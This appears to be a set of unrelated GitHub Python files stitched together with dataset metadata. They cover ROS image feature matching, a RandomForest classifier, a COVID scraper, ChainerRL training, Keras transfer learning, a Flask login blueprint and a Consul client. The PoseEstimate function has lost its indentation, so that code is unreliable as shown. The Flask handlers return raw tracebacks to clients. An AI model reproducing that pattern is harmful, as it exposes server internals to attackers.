    color_img = image
    if cc == 0:
        color_img = cv2.cvtColor(image, cv2.COLOR_GRAY2BGR)
    color = [0,255,0] # bgr colorspace
    linewidth = 3
    # for x,y in points:
    cv2.circle(color_img, (int(point[0]),int(point[1])), 5 , color, thickness = linewidth)  # marker at the averaged point
    plt.cla()
    # plt.plot(color_img)
    plt.imshow(color_img)
    # plt.show()
    plt.pause(0.05)
def find_squares(img):
    """Mask *img* down to its large contour regions.

    Pipeline: median blur -> normalize -> adaptive threshold -> erode ->
    outer contours -> invert -> keep the largest contours (area > 5000 px,
    up to 5 considered) -> dilate -> apply as a mask on the input.

    :param img: grayscale input image.
    :returns: tuple (masked grayscale image, list of retained contours).
    """
    gray_new = img
    # gray_new = cv2.cvtColor(img,cv2.COLOR_RGB2GRAY)
    # edges are preserved while doing median blur while removing noise
    gra = cv2.medianBlur(gray_new,5)
    #image normalization
    gray = np.zeros(gra.shape)
    gray = cv2.normalize(gra, gray, 0, 255, cv2.NORM_MINMAX)
    # adaptive threshold
    thresh = cv2.adaptiveThreshold(gray,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,\
        cv2.THRESH_BINARY,17,2)
    # erode out the noise
    thresh = cv2.erode(thresh,np.ones((3,3), np.uint8),iterations=1)
    im, cnts, hierarchy = cv2.findContours(thresh, cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
    drawing = np.zeros((thresh.shape[0], thresh.shape[1], 3), np.uint8)
    # draw contours
    for i in range(len(cnts)):
        color_contours = (255, 255, 255)
        # draw contours in a black image
        cv2.drawContours(drawing, cnts, i, color_contours, 1, 8, hierarchy)
    # dilate the contour drawing after finding the contours
    drawing1 = cv2.dilate(drawing, np.ones((3,3), np.uint8), iterations=9)
    img_not = np.zeros((drawing1.shape[0], drawing1.shape[1], 3), np.uint8)
    img_not = cv2.bitwise_not(drawing1)
    mask = cv2.cvtColor(img_not, cv2.COLOR_BGR2GRAY)
    im1, cnts1, hierarchy1 = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
    cnt_area = []
    cnt_num = []
    for c in cnts1:
        cnt_area.append(cv2.contourArea(c))
    cnt_num = np.argsort(cnt_area)
    cnt_area.sort()
    large_cnts = np.zeros(np.shape(mask))
    cnts_oi=[]
    # NOTE(review): assumes at least 5 contours were found; raises IndexError otherwise.
    for i in range(5): # in the 5 largest contours, check if cnt_area > 5000
        if cnt_area[len(cnt_area)-1-i] > 5000:
            fresh_im = np.zeros(np.shape(mask))
            cv2.drawContours(fresh_im, cnts1, cnt_num[len(cnt_num)-1-i], (255, 255, 255), -1)
            im_temp = 255*np.ones(mask.shape) - fresh_im
            cv2.drawContours(large_cnts, cnts1, cnt_num[len(cnt_num)-1-i], (255, 255, 255), -1)
            cnts_oi.append(cnts1[cnt_num[len(cnt_num)-1-i]])
    # dilate large contours
    large_cnts = cv2.dilate(large_cnts, np.ones((5,5), np.uint8), iterations=1)
    new_gray = cv2.bitwise_and(gray_new, gray_new, mask = np.uint8(large_cnts))
    # cv2.imshow('mas',new_gray)
    return new_gray, cnts_oi
class Queue:
    """Minimal FIFO queue over a Python list that rejects duplicate entries."""

    def __init__(self):
        # Newest items live at index 0; pop() from the end yields FIFO order.
        self.queue = list()

    def enqueue(self, data):
        """Insert *data* at the front; returns False (no-op) if already queued."""
        if data in self.queue:
            return False
        self.queue.insert(0, data)
        return True

    def dequeue(self):
        """Remove and return the oldest item, or a message string when empty."""
        if not self.queue:
            return ("Queue Empty!")
        return self.queue.pop()

    def size(self):
        """Number of items currently queued."""
        return len(self.queue)

    def printQueue(self):
        """Return the backing list (newest first)."""
        return self.queue
points_max_cx = Queue()
points_max_cy = Queue()
def PoseEstimate(leftImg,rightImg):
# Estimate the tracked target's image-plane centroid from the left camera
# frame and publish it (geometry_msgs Point on center_pub, annotated image on
# contours_pub).
# NOTE(review): rightImg is accepted but never used here; the function also
# relies on module-level state (bridge, des_img_des, it, rolavnum, KMeans,
# Point, center_pub, contours_pub, plotter, find_squares, featuredetect,
# featurecompare) -- confirm all are initialised before the first call.
global it
left_image = bridge.imgmsg_to_cv2(leftImg, desired_encoding="mono8")
img = left_image
large_cnts = 0
# Mask the frame down to the large contours of interest.
img, cnts_oi = find_squares(img)
b1 = 0
kp1, des1 = featuredetect(left_image)
cur_img_des = des1
b = cur_img_des
# Match current-frame descriptors against the stored reference descriptors.
matches = featurecompare(cur_img_des, des_img_des)
points = np.zeros((len(matches),2))
delta = np.zeros((len(matches),2))
dist = np.zeros((len(matches)))
matchMask = np.zeros((len(matches),2))
# ratio test as per Lowe's paper
# source: https://opencv-python-tutroals.readthedocs.io/en/latest/py_tutorials/py_feature2d/py_matcher/py_matcher.html
if len(matches)!=0:
# NOTE(review): range(0, len(matches)-1) skips the final match -- confirm
# whether that off-by-one is intentional.
for i in range(0,len(matches)-1):
points[i] = kp1[matches[i][0].queryIdx].pt#features[m.queryIdx]]
if matches[i][0].distance < 0.8*matches[i][1].distance:
matchMask[i]=[1,0]
# Keep only keypoints that passed the 0.8 ratio test.
matchMaskbool = matchMask.astype('bool')
points = points[matchMaskbool[:,0]]
# Finding points inside contours
# y = 0
points_new = []#np.zeros((len(matches),2))
for x in range(len(points)):
for l in range(len(cnts_oi)):
# print(points[x].tolist())
point = (int(points[x][0]), int(points[x][1]))
# pointPolygonTest >= 0 means the point is on or inside the contour.
dist = cv2.pointPolygonTest(cnts_oi[l],point,False)
if dist >= 0:
points_new.append(points[x])
# y = y+1
# Finding average points
# classifications, centers = kmeans(points_new)
# Cluster the surviving points (at most 3 clusters, fewer if few points).
clusters_num = 3
if len(points_new)<clusters_num:
clusters_num = len(points_new)
if clusters_num:
print(clusters_num)
estimator = KMeans(n_clusters=clusters_num)
estimator.fit(points_new)
# Ck's are the different clusters with corresponding point indices
c1 = np.where(estimator.labels_ == 0)[0]
c2 = np.where(estimator.labels_ == 1)[0]
c3 = np.where(estimator.labels_ == 2)[0]
# Pick the most populated cluster as the target.
max_len = len(c1)
max_c = 0
max_con = c1
if len(c2) > max_len:
max_len = len(c2)
max_c = 1
max_con = c2
if len(c3) > max_len:
max_len = len(c3)
max_c = 2
max_con = c3
points_max_c = []
# print(points_new[max_con[0]][:])
for i in range(max_len):
points_max_c.append(points_new[max_con[i]][:])
max_cx = estimator.cluster_centers_[max_c][0]
max_cy = estimator.cluster_centers_[max_c][1]
# Maintain a rolling window of the last rolavnum centroids.
# NOTE(review): Queue.enqueue silently drops duplicate values, so the
# window can hold fewer than rolavnum samples -- confirm acceptable.
if it<rolavnum:
points_max_cx.enqueue(max_cx)
points_max_cy.enqueue(max_cy)
else:
points_max_cx.dequeue()
points_max_cy.dequeue()
points_max_cx.enqueue(max_cx)
points_max_cy.enqueue(max_cy)
it = it + 1
x = 0
y = 0
temo1 = points_max_cx.printQueue()
temo2 = points_max_cy.printQueue()
for i in range (points_max_cy.size()):
x = x + temo1[i]
y = y + temo2[i]
# rolling avg centroid
x = int(x/points_max_cy.size())
y = int(y/points_max_cy.size())
# Publish the smoothed centroid and the annotated debug image.
outt = Point()
outt.x=x
outt.y=y
center_pub.publish(outt)
# plotavg(img,(x,y),0)
centroid = [x,y]
# # plotter(img,np.array(points_new),0, (255, 0, 0))
pub_cv = plotter(img, points_new, points_max_c, centroid, 0, (255, 0, 0), (0, 0, 255), (0, 255, 0))
contours_pub.publish(bridge.cv2_to_imgmsg(pub_cv, "rgb8"))
if __name__ == '__main__':
# Entry point: run the ROS detection loop; node shutdown raises
# ROSInterruptException, which is swallowed for a clean exit.
try:
rundetection()
except rospy.ROSInterruptException:
pass
| tkurtiak/Project4b | matchfeat_old.py | matchfeat_old.py | py | 12,217 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sys.path",
"line_number": 37,
"usage_type": "attribute"
},
{
"api_name": "sys.path.remove",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 39,
"usage_type": "attribute"
},
{
"api_name": "sys.path.append",
"li... |
74105436582 | import sqlite3
from sklearn.ensemble import RandomForestClassifier
from sklearn.feature_extraction.text import TfidfVectorizer
from datetime import datetime as dt
# NOTE(review): sklearn.externals.joblib is removed in modern scikit-learn;
# switch to the standalone `joblib` package when upgrading.
from sklearn.externals import joblib

# Train a RandomForest text classifier on the `train` table of textarray.db,
# then predict and write categories back into the `test` table.
start_time = dt.now()

# --- data loading ---
conn = sqlite3.connect("textarray.db")
cur = conn.cursor()
query = '''SELECT * from train'''
cur.execute(query)
y_train, names, descs, X_train = [], [], [], []
for c, n, d, w in cur.fetchall():
    y_train.append(c)
    names.append(n)
    descs.append(d)
    X_train.append(w)

# NOTE(review): fit_transform re-fits the vectorizer loaded from vect.pkl on
# the training text; use transform() if the saved vocabulary must be reused.
vectorizer = joblib.load('vect.pkl')
XtrV = vectorizer.fit_transform(X_train).toarray()  # X-Train-Vectorized

RF = RandomForestClassifier(n_estimators=100,
                            max_depth=9,
                            n_jobs=4)
RF.fit(XtrV, y_train)
joblib.dump(RF, 'RF.pkl', compress=9)

# --- validation on the test set ---
query = '''SELECT * from test'''
cur.execute(query)
y_test, names, descs, X_test = [], [], [], []
for c, n, d, w in cur.fetchall():
    y_test.append(c)
    names.append(n)
    descs.append(d)
    X_test.append(w)
test_size = len(y_test)

XteV = vectorizer.transform(X_test).toarray()  # X-Test-Vectorized
pred = RF.predict(XteV)
for i in range(test_size):
    cur.execute('''UPDATE test SET cat=? WHERE name=?''', (pred[i], names[i]))
# BUG FIX: the original never committed, so the UPDATEs above were rolled
# back when the connection was implicitly closed at interpreter exit.
conn.commit()
conn.close()
print('Estimated: {0}'.format(dt.now()-start_time))
| kirilenkobm/ML_examples | RandomForestClf.py | RandomForestClf.py | py | 1,335 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "datetime.datetime.now",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "sqlite3.connect",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "sklearn.external... |
25617944185 | import numpy as np
from bs4 import BeautifulSoup
import pandas as pd
import requests
import time
import json
from tomlkit import array

# Scrape the Riau province COVID-19 monitoring table and export the per-city
# spesimen/suspek/terkonfirmasi counts to JSON and CSV.
URL = "https://covid19.riau.go.id/pantauan_data_kasus"
HEADERS = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36'
}
FILEDIR = "./"
FILENAME = "covid19-data-riau"

start_time = time.time()

r = requests.get(URL, headers=HEADERS).text
soup = BeautifulSoup(r, "html.parser")

section_title = soup.find("div", class_="section-title").text.strip()
# City rows link out to corona.riau.go.id detail pages.
city_list = soup.find_all("a", attrs={"href": lambda txt: "corona.riau" in txt.lower()})
all_cases = soup.find_all("td", class_="text-right")
labels = soup.find_all("th", class_="text-center")
labels = [label.text.strip() for label in labels]

# Flatten the counter cells, then reshape to one row per city.
# labels[:3] are row headers; labels[3:] are the per-city counter columns.
cases = [cell.text.strip() for cell in all_cases]
cases = np.array(cases).reshape((len(city_list), len(labels[3:])))

data = {}
for i, city in enumerate(city_list):
    city_url = city["href"]
    city = city.text.strip()
    data[city] = {
        "city url": city_url,
        "cases": {
            # Column groups: 4 spesimen, 4 suspek, remaining terkonfirmasi.
            "spesimen": dict(zip(labels[3:7], cases[i][:4])),
            "suspek": dict(zip(labels[7:11], cases[i][4:8])),
            "terkonfirmasi": dict(zip(labels[11:], cases[i][8:])),
        }
    }

with open("{}.json".format(FILENAME), "w", encoding="utf-8") as f:
    json.dump(data, f, ensure_ascii=False, indent=4)

index = pd.Index([city.text.strip() for city in city_list])
columns = pd.MultiIndex.from_arrays(
    (['spesimen']*4 + ['suspek']*4 + ['terkonfirmasi']*4, labels[3:])
)
df = pd.DataFrame(cases, index=index, columns=columns)
print(df.head(20))
df.to_csv("{}.csv".format(FILENAME), index=True)

# BUG FIX: the original used "%s.3f", which printed the full elapsed-seconds
# repr followed by a literal ".3f"; "%.3f" formats the float to 3 decimals.
print("Finish in %.3f seconds." % (time.time()-start_time))
| mfalfafa/scrape-covid19-data-riau | scraper.py | scraper.py | py | 1,975 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "time.time",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_numb... |
846869458 | import argparse
import json
import os
from datetime import datetime
from statistics import mean
import chainer
import chainerrl
import numpy as np
from chainerrl.wrappers import CastObservationToFloat32, ScaleReward
from estimator import RecoNet, ThreatEstimator
from q_func import RPDQN, QFunction, RPQFunction
from util import Environment, default_circuit
if __name__ == '__main__':
parser = argparse.ArgumentParser(
prog='run.py',
description='run learning',
add_help=True
)
parser.add_argument('--gpu', dest='gpu', action='store_true')
parser.add_argument('--seed', dest='seed', default=0, type=int)
parser.add_argument('--load', dest='load', default='', type=str)
parser.add_argument('--normal', dest='normal', action='store_true')
parser.add_argument('--adameps', dest='adam_eps', default=1e-2, type=float)
parser.add_argument('--adamalpha', dest='adam_alpha',
default=1e-3, type=float)
parser.add_argument('--gamma', dest='gamma', default=0.90, type=float)
parser.add_argument('--alllog', dest='all_log', action='store_true')
parser.add_argument('--lmd', dest='lmd', default=200, type=int)
parser.add_argument('--scale', dest='scale', default=1.0, type=float)
parser.add_argument('--firsteps', dest='firsteps', default=1.0, type=float)
parser.add_argument('--step', dest='step', default=3 * 10 ** 6, type=int)
parser.add_argument('--demo', dest='demo', action='store_true')
parser.add_argument('--render', dest='ren', action='store_true')
parser.add_argument('--eval', dest='eval', type=str, default='')
parser.add_argument('-t', dest='times', default=100, type=int)
args = parser.parse_args()
gpus = (0,) if args.gpu else ()
chainerrl.misc.set_random_seed(args.seed, gpus)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
result_dir = os.path.join('results/circuit', timestamp)
os.makedirs(result_dir)
with open(os.path.join(result_dir, 'args.json'), 'w') as f:
json.dump(args.__dict__, f, indent=2)
circuit = default_circuit()
rand = False if args.demo else True
env = Environment(circuit=circuit,
random_init=rand, result_dir=result_dir, file='crash_train.log', all_log=args.all_log,
lmd=args.lmd, render=args.ren)
n_actions = len(env.agent.action_list)
env = ScaleReward(env, args.scale)
reconet = RecoNet()
estimator = ThreatEstimator(
reconet, 'circuit/threat.model', args.gpu)
danger_limit = 1e-3
step = args.step
if args.normal:
q_func = QFunction(n_actions)
else:
q_func = RPQFunction(n_actions, estimator,
danger_limit)
optimizer = chainer.optimizers.Adam(
eps=args.adam_eps, alpha=args.adam_alpha)
optimizer.setup(q_func)
explorer = chainerrl.explorers.LinearDecayEpsilonGreedy(
args.firsteps, 0.05, step, random_action_func=lambda: np.random.randint(n_actions))
replay_buffer = chainerrl.replay_buffer.PrioritizedReplayBuffer(1e6)
if args.normal:
agent = chainerrl.agents.DoubleDQN(
q_func, optimizer, replay_buffer, args.gamma, explorer, clip_delta=False,
replay_start_size=600, update_interval=1,
target_update_interval=1e3)
else:
agent = RPDQN(
q_func, optimizer, replay_buffer, args.gamma, explorer, clip_delta=False,
replay_start_size=600, update_interval=1,
target_update_interval=1e3)
env.unwrapped.result_agent = agent
if args.demo:
if args.load:
agent.load(args.load)
for i in range(args.times):
obs = env.reset()
done = False
total = 0
st = 0
while not done:
action = agent.act(obs)
obs, r, done, _ = env.step(action)
env.unwrapped.render()
total += r
st += 1
num = '%03d' % st
if st >= 200:
break
print('Reward:', total)
elif args.eval:
def gen_dir_name(jobid):
times = step // 10**5
yield ''
dirname = args.eval + '/'
for i in range(times - 1):
yield dirname + 'agent' + str(i + 1)
yield dirname + str(int(step)) + '_finish'
crash_ratio = []
reward_list = []
steps = np.arange(0, step + 1, 10**5)
for agent_dir_name in gen_dir_name(args.eval):
if agent_dir_name:
agent.load(agent_dir_name)
print('agent:', agent_dir_name)
env = Environment(circuit=circuit,
random_init=True, result_dir=result_dir,
file='crash_train.log', all_log=args.all_log,
lmd=args.lmd)
total_episode_reward = []
for i in range(args.times):
obs = env.reset()
done = False
total = 0
st = 0
while not done:
action = agent.act(obs)
obs, r, done, _ = env.step(action)
total += r
st += 1
num = '%03d' % st
if st >= 200:
break
if not env.crashed:
total_episode_reward.append(total)
ave_reward = mean(total_episode_reward) if len(
total_episode_reward) > 0 else np.nan
ratio = env.crash_cnt / args.times
print('result: crash_cnt ', ratio,
' pure_reward ', ave_reward, end='\n\n')
crash_ratio.append(ratio)
reward_list.append(ave_reward)
crash_ratio = np.array(crash_ratio)
reward_list = np.array(reward_list)
data = np.vstack((steps, crash_ratio))
data2 = np.vstack((steps, reward_list))
print(data)
np.save(os.path.join(result_dir, 'crash.npy'), data)
print(data2)
np.save(os.path.join(result_dir, 'reward.npy'), data2)
else:
if args.load:
agent.load(args.load)
chainerrl.experiments.train_agent_with_evaluation(
agent, env, steps=step, eval_n_steps=None, eval_n_episodes=1,
train_max_episode_len=200, eval_interval=1e4, outdir=result_dir,
eval_env=Environment(circuit=circuit, result_dir=result_dir, file='crash_test.log',
all_log=True, lmd=200))
| pfnet-research/rp-safe-rl | circuit/run.py | run.py | py | 6,662 | python | en | code | 7 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "chainerrl.misc.set_random_seed",
"line_number": 49,
"usage_type": "call"
},
{
"api_name": "chainerrl.misc",
"line_number": 49,
"usage_type": "attribute"
},
{
"api_na... |
44396105133 | import numpy as np
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
import tensorflow_datasets as tfds
import os
if __name__ == '__main__':
tfds.disable_progress_bar()
train_ds, validation_ds, test_ds = tfds.load(
"cats_vs_dogs",
data_dir=os.path.expanduser("~/junk/"),
# Reserve 10% for validation and 10% for test
split=[
tfds.Split.TRAIN.subsplit(tfds.percent[:40]),
tfds.Split.TRAIN.subsplit(tfds.percent[40:50]),
tfds.Split.TRAIN.subsplit(tfds.percent[50:60])
],
as_supervised=True, # Include labels
)
print("Number of training samples: %d" % tf.data.experimental.cardinality(train_ds))
print("Number of validation samples: %d" % tf.data.experimental.cardinality(validation_ds))
print("Number of test samples: %d" % tf.data.experimental.cardinality(test_ds))
size = (150, 150)
train_ds = train_ds.map(lambda x, y: (tf.image.resize(x, size), y))
validation_ds = validation_ds.map(lambda x, y: (tf.image.resize(x, size), y))
test_ds = test_ds.map(lambda x, y: (tf.image.resize(x, size), y))
batch_size = 32
train_ds = train_ds.cache().batch(batch_size).prefetch(buffer_size=10)
validation_ds = validation_ds.cache().batch(batch_size).prefetch(buffer_size=10)
test_ds = test_ds.cache().batch(batch_size).prefetch(buffer_size=10)
data_augmentation = keras.Sequential(
[
layers.experimental.preprocessing.RandomFlip("horizontal"),
layers.experimental.preprocessing.RandomRotation(0.1),
]
)
base_model = keras.applications.Xception(
weights="imagenet", # Load weights pre-trained on ImageNet.
input_shape=(150, 150, 3),
include_top=False, # Do not include the ImageNet classifier at the top.
)
base_model.trainable = False # Freeze the base_model
# Create new model on top
inputs = keras.Input(shape=(150, 150, 3))
x = data_augmentation(inputs)
# Pre-trained Xception weights requires that input be normalized from (0, 255) to a range (-1., +1.),
# the normalization layer does the following, outputs = (inputs - mean) / sqrt(var)
norm_layer = keras.layers.experimental.preprocessing.Normalization()
mean = np.array([127.5] * 3)
var = mean ** 2
x = norm_layer(x) # Scale inputs to [-1, +1]
norm_layer.set_weights([mean, var])
# The base model contains batchnorm layers.
# We want to keep them in inference mode when we unfreeze the base model for fine-tuning,
# so we make sure that the base_model is running in inference mode here.
x = base_model(x, training=False)
x = keras.layers.GlobalAveragePooling2D()(x)
x = keras.layers.Dropout(0.2)(x) # Regularize with dropout
outputs = keras.layers.Dense(1)(x)
model = keras.Model(inputs, outputs)
model.summary()
model.compile(
optimizer=keras.optimizers.Adam(),
loss=keras.losses.BinaryCrossentropy(from_logits=True),
metrics=[keras.metrics.BinaryAccuracy()],
)
"""train the top layer"""
epochs = 20
model.fit(train_ds, epochs=epochs, validation_data=validation_ds)
"""do a round of fine-tuning of the entire model"""
base_model.trainable = True
model.summary()
model.compile(
optimizer=keras.optimizers.Adam(1e-5), # Low learning rate for fine tuning
loss=keras.losses.BinaryCrossentropy(from_logits=True),
metrics=[keras.metrics.BinaryAccuracy()],
)
epochs = 10
model.fit(train_ds, epochs=epochs, validation_data=validation_ds)
| jk983294/morph | book/tensorflow/models/transfer.py | transfer.py | py | 3,632 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "tensorflow_datasets.disable_progress_bar",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "tensorflow_datasets.load",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "os.path.expanduser",
"line_number": 12,
"usage_type": "call"
},
{
... |
30838346418 | from flask import Blueprint, current_app, request, make_response, jsonify
from ..models.User import User
from flask_jwt_extended import (
create_access_token,
create_refresh_token,
jwt_required,
)
import traceback
auth_bp = Blueprint('auth_bp', __name__)
# register user
@auth_bp.route('/user/registration', methods=['POST'])
def deo_registration():
    """Create a new user account from a JSON or form payload.

    Requires username, password, first_name, surname, age, HIV_status and
    Phone_number. Returns 201 on success, 400 on validation failure.
    """
    try:
        if request.is_json:
            data = request.get_json(force=True)
        else:
            data = request.form
        # BUG FIX: 'password' and 'age' are read below but were missing from
        # this required-field check, so omitting them produced a 500
        # (KeyError) instead of a clean 400 validation error.
        columns = ["username", "password", "first_name", "surname", "age",
                   "HIV_status", "Phone_number"]
        for column in columns:
            if column not in data:
                return make_response(jsonify({'message': f'{column} is missing from payload!'}), 400)
        existing_user = User.query.filter(User.username == data['username']).first()
        if existing_user:
            return make_response(jsonify({'message': 'Username already exists!'}), 400)
        if len(data['Phone_number']) > 15 or len(data['Phone_number']) < 10:
            return make_response(jsonify({'message': 'Phone number should be between 10-15 digits!'}), 400)
        # create new User (password stored hashed, never in plain text)
        new_user = User(
            username = data['username'],
            first_name = data['first_name'],
            password = User.hash_password(data['password']),
            surname = data['surname'],
            age = data['age'],
            HIV_status = data['HIV_status'],
            Phone_number = data['Phone_number']
        )
        new_user.save()
        resp = jsonify({'message':'Account created successfully'})
        return make_response(resp, 201)
    except:
        # NOTE(review): returning the raw traceback discloses internals to
        # untrusted clients -- consider logging it and returning a generic 500.
        return make_response(str(traceback.format_exc()),500)
# user login
@auth_bp.route('/user/login', methods=['POST'])
def login():
# Authenticate a user and issue JWT access/refresh tokens.
# 200 with tokens on success, 400 for unknown account or bad credentials,
# 500 (with traceback text) on unexpected errors.
try:
data = request.get_json(force=True)
username = data['username']
user = User.query.filter(User.username==username).first()###
password = data['password']
# NOTE(review): tokens are minted before the account/password checks below;
# they are only returned on success, but the work is wasted on failures.
access_token = create_access_token(identity = data['username'])
refresh_token = create_refresh_token(identity = data['username'])
if not user:
return make_response(jsonify({"message":"Account doesn't exist"}),400)
if not user.is_password_valid(password):
return make_response(jsonify({"message":"Invalid credentials"}),400)
resp = jsonify({'access_token':access_token,
'refresh_token':refresh_token,
'message':'Login Successful'
})
return make_response(resp,200)
except:
# NOTE(review): raw traceback in the response leaks internals to clients.
return make_response(str(traceback.format_exc()),500)
# get all system users
@auth_bp.route('/user/get_users', methods=['GET'])
@jwt_required()
def get_all_users():
# Return one page of users (newest first by user_id) plus pagination
# metadata. Page size comes from app config NUM_OF_ITEMS_PER_PAGE; the page
# number comes from the ?page= query arg (default 1).
try:
num_of_items = current_app.config['NUM_OF_ITEMS_PER_PAGE']
page = request.args.get('page', 1, type=int)
pagination_info = {}
user_data = User.query.order_by(User.user_id.desc()).paginate(page, num_of_items, False)
# Map the Flask-SQLAlchemy Pagination object onto the response metadata.
pagination_info['next_page'] = user_data.next_num
pagination_info['prev_page'] = user_data.prev_num
pagination_info['current_page'] = user_data.page
pagination_info['no_of_pages'] = user_data.pages
pagination_info['items_per_page'] = user_data.per_page
pagination_info['total_items'] = user_data.total
users = [z.serialise() for z in user_data.items]
return make_response(jsonify({"data": users, "info": pagination_info}),200)
except:
# NOTE(review): raw traceback in the response leaks internals to clients.
return make_response(str(traceback.format_exc()),500)
# get user by id
@auth_bp.route('/user/get_user/<int:user_id>', methods=['GET'])
@jwt_required()
def get_user(user_id):
    """Return a single serialised user by primary key.

    Responds 404 when the id does not exist, 200 with the user otherwise.
    """
    try:
        user = User.query.get(user_id)
        # BUG FIX: Query.get returns None for a missing id; the original then
        # crashed on None.serialise() and returned a 500 with a traceback
        # instead of a clean 404.
        if user is None:
            return make_response(jsonify({'message': 'User not found!'}), 404)
        return make_response(jsonify(user.serialise()),200)
    except:
        # NOTE(review): raw traceback in the response leaks internals.
        return make_response(str(traceback.format_exc()),500)
| conradsuuna/uac-computer-competency | app/controllers/users.py | users.py | py | 4,056 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Blueprint",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "flask.request.is_json",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "flask.reques... |
4289870302 | # consul_client.py
import consul
import socket
import time
import threading
import json
import re
import random
from flask import Flask
from typing import Dict, List, Union
from dzmicro.utils import compare_dicts
class WatchKVThread(threading.Thread):
def __init__(self, uuid: str, is_platform: bool) -> None:
super().__init__(name=f'WatchKV')
self.uuid = uuid
self.is_platform = is_platform
self._stop = False
self._kv = {}
def set_server_unique_info(self) -> None:
from dzmicro.utils import singleton_server_manager
self.server_unique_info = singleton_server_manager.get_server_unique_info(self.uuid)
self._prefix = self.server_unique_info.consul_info.get_prefix()
def stop(self) -> None:
self._stop = True
def on_config_changed(self, config_dict: Dict[str, any], change: str) -> None:
bot_commands = self.server_unique_info.bot_commands
if change == 'add':
pattern = fr"{self._prefix}(\w+)/config"
for key, value in config_dict.items():
match = re.search(pattern, key)
if match:
service_name = f'DBot_{match.group(1)}'
keyword = value.get('keyword')
bot_commands.add_keyword(keyword, service_name)
commands = value.get('commands')
if service_name and commands:
for command in commands:
bot_commands.add_commands(keyword, command)
def on_listener_changed(self, listener_dict: Dict[str, any], change: str) -> None:
from dzmicro.utils import singleton_server_manager
server_shared_info = singleton_server_manager.get_server_shared_info()
listener_manager = server_shared_info.listener_manager
pattern = fr"{self._prefix}(\w+)/listeners"
for key, value in listener_dict.items():
match = re.search(pattern, key)
if match:
if change == 'add':
service_name = f'DBot_{match.group(1)}'
#TODO 需不需要比较service_name和value中的service_name是否一致?
listener_manager.update_listeners(value)
elif change == 'modify':
#TODO 完善listener_manager.update_listeners的功能,让他可以自动适应添加与修改
listener_manager.update_listeners(value.get('old'), is_rm=True)
listener_manager.update_listeners(value.get('new'))
elif change == 'delete':
listener_manager.update_listeners(value, is_rm=True)
def on_add_kv(self, added_dict: Dict[str, any]) -> None:
print(f'添加\n{added_dict}\n')
self.on_config_changed(added_dict, 'add')
self.on_listener_changed(added_dict, 'add')
def on_deleted_kv(self, deleted_dict: Dict[str, any]) -> None:
#TODO 配置文件删除
print(f'删除\n{deleted_dict}\n')
self.on_config_changed(deleted_dict, 'delete')
self.on_listener_changed(deleted_dict, 'delete')
def on_modified_kv(self, modified_dict: Dict[str, any]) -> None:
#TODO 配置文件修改
print(f'修改\n{modified_dict}\n')
self.on_config_changed(modified_dict, 'modify')
self.on_listener_changed(modified_dict, 'modify')
def run(self) -> None:
consul_client = self.server_unique_info.consul_client
while not self._stop:
new_kv = {}
while True:
try:
# 获取指定文件夹下的所有key
#TODO 这个前缀也可以在kv中配置
keys = consul_client.download_key_value(self._prefix, [], True)
break
except:
print('下载字典失败,正在重试')
time.sleep(1)
# 读取所有key的值,并将结果存储在字典中
for key in keys:
while True:
try:
json_data = consul_client.download_key_value(key, '')
new_kv[key] = json_data
break
except:
print('下载字典失败,正在重试')
time.sleep(1)
added, deleted, modified = compare_dicts(self._kv, new_kv)
if added:
self.on_add_kv(added)
if deleted:
self.on_deleted_kv(deleted)
if modified:
self.on_modified_kv(modified)
self._kv = new_kv
time.sleep(1)
class ConsulClient:
    """Consul helper for one server (*uuid*): service registration and
    discovery, plus JSON key/value access under the server's KV prefix."""

    def __init__(self, uuid: str, is_platform: bool = False, host: str = 'localhost', port: int = 8500) -> None:
        # NOTE(review): set_server_unique_info() must run before any helper
        # that needs the KV prefix or the ACL token.
        self.uuid = uuid
        self.is_platform = is_platform
        self.consul = consul.Consul(host=host, port=port)

    def set_server_unique_info(self) -> None:
        """Load this server's shared info and apply its KV prefix and token."""
        from dzmicro.utils import singleton_server_manager
        self.server_unique_info = singleton_server_manager.get_server_unique_info(self.uuid)
        self.prefix = self.server_unique_info.consul_info.get_prefix()
        self.consul.token = self.server_unique_info.consul_info.get_token()

    def register_service(self, service_name: str, service_port: Union[str, int], service_tags: Union[List[str], None] = None) -> str:
        """Register this host for *service_name* with an HTTP /health check.

        Returns the generated service id '<name>-<hostname>'. *service_tags*
        defaults to no tags (None replaces the original mutable [] default).
        """
        service_tags = service_tags or []
        service_id = f'{service_name}-{socket.gethostname()}'
        service_address = socket.gethostbyname(socket.gethostname())
        service_check = consul.Check.http(url=f'http://{service_address}:{service_port}/health', interval='10s')
        self.consul.agent.service.register(name=service_name, service_id=service_id, address=service_address,
                                           port=service_port, tags=service_tags, check=service_check)
        return service_id

    def update_key_value(self, dict_to_upload: Dict[str, any]) -> None:
        """Upload every key/value pair as JSON, retrying each put forever."""
        for key, value in dict_to_upload.items():
            while True:
                try:
                    value_json = json.dumps(value)
                    self.consul.kv.put(key, value_json.encode('utf-8'))
                    break
                except consul.base.ConsulException:
